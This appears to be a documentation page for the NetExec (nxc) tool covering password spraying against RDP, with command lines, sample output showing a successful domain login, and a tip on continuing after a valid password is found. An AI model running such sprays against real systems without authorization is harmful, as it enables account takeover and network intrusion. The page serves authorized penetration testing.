Password spraying
Password spraying
nxc rdp <target> -u <username> -p <password>
nxc rdp <target> -u <username> -p <password>
RDP <target> 3389 DC01 [*] Windows 10 or Windows Server 2016 Build 17763 (name:DC01) (domain:<domain>)
RDP <target> 3389 DC01 [-] <domain>\<username>:<password>
Password spraying (without bruteforce)
nxc rdp <target> -u userfile -p passwordfile --no-bruteforce
Expected Results:
nxc rdp <target> -u /tmp/users -p passwordfile --no-bruteforce
RDP <target> 3389 DC01 [*] Windows 10 or Windows Server 2016 Build 17763 (name:DC01) (domain:<domain>)
RDP <target> 3389 DC01 [-] <domain>\user1:pass1
RDP <target> 3389 DC01 [-] <domain>\user2:pass2
RDP <target> 3389 DC01 [+] <domain>\user3:<password> (Pwn3d!)
{% hint style="info" %}
By default, nxc will exit after a successful login is found. Using the --continue-on-success flag will continue spraying even after a valid password is found. Useful for spraying a single password against a large user list.
{% endhint %}